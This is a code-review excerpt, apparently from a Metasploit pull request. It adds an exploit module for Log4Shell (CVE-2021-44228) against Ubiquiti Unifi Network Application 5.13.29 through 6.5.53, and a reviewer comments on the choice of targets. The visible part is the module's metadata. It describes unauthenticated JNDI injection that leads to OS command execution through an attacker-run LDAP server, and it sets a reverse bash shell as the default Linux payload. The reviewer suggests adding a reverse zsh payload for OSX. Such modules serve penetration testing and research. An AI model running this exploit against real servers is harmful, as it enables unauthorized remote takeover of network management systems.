modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb

```diff
@@ -0,0 +1,154 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::JndiInjection
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(_info = {})
+    super(
+      'Name' => 'Unifi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
+      'Description' => %q{
+        The Ubiquiti Unifi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
+        vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
+        deserialize a malicious Java object. This results in OS command execution.
+
+        This module will start an LDAP server that the target will need to connect to.
+      },
+      'Author' => [
+        'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff
+        'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff
+        'Nicholas Anastasi' # Unifi research
+      ],
+      'References' => [
+        [ 'CVE', '2021-44228' ],
+        [ 'URL', 'https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi' ],
+        [ 'URL', 'https://github.com/puzzlepeaches/Log4jUnifi' ],
+        [ 'URL', 'https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1' ]
+      ],
+      'DisclosureDate' => '2021-12-09',
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'RPORT' => 8443,
+        'SSL' => true,
+        'WfsDelay' => 30
+      },
+      'Targets' => [
+        [
+          'Windows', {
+            'Platform' => 'win'
+          },
+        ],
+        [
+          'Linux', {
+            'Platform' => 'unix',
+            'Arch' => [ARCH_CMD],
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_bash'
+            }
+          },
+        ]
```

Comment:
could add OSX as a target with `cmd/unix/reverse_zsh` payload, or change Linux to *nix or something similar.